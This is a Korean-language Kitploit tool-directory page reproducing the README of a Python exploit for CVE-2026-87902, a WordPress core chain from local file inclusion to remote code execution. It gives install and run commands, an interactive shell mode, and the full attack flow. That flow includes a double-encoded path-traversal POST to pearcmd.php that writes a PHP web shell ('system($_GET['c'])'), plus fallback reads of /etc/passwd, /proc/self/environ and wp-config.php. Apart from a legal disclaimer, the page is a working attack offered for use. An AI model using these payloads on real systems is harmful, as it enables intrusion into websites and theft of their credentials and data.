Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPost-ExploitationWeb SecurityPenetration TestingRemote Access ToolPayload Development
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

CVE-2026-87902에 대한 Python 익스플로잇으로, WordPress Core의 LFI-to-RCE 체인입니다. 버전을 핑거프린팅하고 pearcmd를 통해 PHP 셸을 작성하며, 명령 실행 또는 LFI 폴백을 제공합니다.

저장소 보기
113시간 8분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

cve-2026-87902

CVE-2026-87902 – WordPress 코어 LFI에서 RCE로 이어지는 익스플로잇 (자동 강제 실행 에디션)

maked by alfaris

⚠️ 법적 경고 소유하지 않았거나 서면으로 테스트 허가를 받지 않은 시스템에 사용하는 것은 불법이며 사이버 범죄법에 따라 처벌받을 수 있습니다. 작성자는 오용에 대해 어떠한 책임도 지지 않습니다.


📌 취약점 요약

필드값
CVECVE-2026-87902
유형로컬 파일 포함(LFI) → 원격 코드 실행(RCE)
CWECWE-98
CVSS v3.19.2 (치명적)
공격 벡터네트워크 (인증 불필요)
영향받는 버전WordPress 4.7.0 – 7.1.1
패치됨WordPress 7.1.2 (및 4.7.37까지의 백포트)
근본 원인get_page_template()이 pagename 매개변수를 URL 디코딩한 후 validate_file()을 호출하지 않아, 이중 인코딩된 경로 탐색(%252E%252E%252F)이 정화를 우회하고 테마 디렉터리 외부의 임의 .php 파일을 포함할 수 있게 합니다.

RCE 전제 조건

전체 RCE를 위해서는 다음 모두가 참이어야 합니다:

  1. WordPress 버전이 4.7.0에서 7.1.1 사이
  2. 활성 테마에 최상위 page-* 디렉터리가 존재 (예: page-templates/)
  3. 최소 하나의 게시된 페이지가 존재
  4. pearcmd.php가 존재하고 웹 서버 사용자가 읽을 수 있음 (공식 PHP Docker 이미지 및 PHP < 8.5를 사용하는 많은 cPanel 설치에서 기본값)
  5. PHP에 register_argc_argv=On 설정 (PHP < 8.5에서 기본값)
  6. 호스트 OS가 Linux (Windows 경로 탐색 구문은 다름)

이 중 하나라도 누락되면 익스플로잇은 LFI 전용 파일 읽기로 폴백합니다.


📂 파일

exploit.py # 메인 익스플로잇 스크립트 README.md # 이 파일 report.json # (선택 사항) -o 사용 시 출력 보고서

⚙️ 요구 사항

  • Python 3.8+
  • requests 라이브러리

설치:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. 기본 스캔 (상세 출력)
root@kitploit:~
python3 exploit.py -t https://site.com -v

이 명령은:

· WordPress 버전 및 활성 테마 핑거프린팅 · 취약한 버전 범위 확인 · 게시된 페이지 ID 찾기 (REST → sitemap → 무차별 대입) · pearcmd.php를 통한 PHP 셸 작성 시도 · 셸을 포함하고 id 실행 시도 · RCE 실패 시 민감한 파일에 대한 LFI로 폴백

  1. 단일 명령 실행
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. 대화형 셸 (RCE가 성공한 경우에만)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

셸 내부:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. 보고서를 JSON으로 저장
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. 옵션 조합
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 CLI 참조

플래그 긴 이름 설명 -t --target 필수. 대상 WordPress URL (끝에 슬래시 없음). -c --command RCE 후 단일 셸 명령 실행. -i --interactive RCE 후 대화형 셸 열기. -v --verbose 상세 진행 상황 출력. -o --output 최종 보고서를 지정된 경로에 JSON으로 저장. -h --help 도움말 표시.

🔄 익스플로잇 흐름

root@kitploit:~
[1] 핑거프린팅
      ├─ WordPress 버전 (meta generator / asset ?ver=)
      └─ 활성 테마 (/wp-content/themes/<name>/)

[2] 버전 확인
      └─ 4.7.0 – 7.1.1 ? 계속 : 경고 후 계속

[3] 페이지 ID 찾기
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ 무차별 대입: /?page_id=1..30

[4] page-* 디렉터리 확인
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] pearcmd를 통한 셸 작성
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] 셸 포함
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] 폴백 LFI (RCE 실패 시)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. 변형
도구 다운로드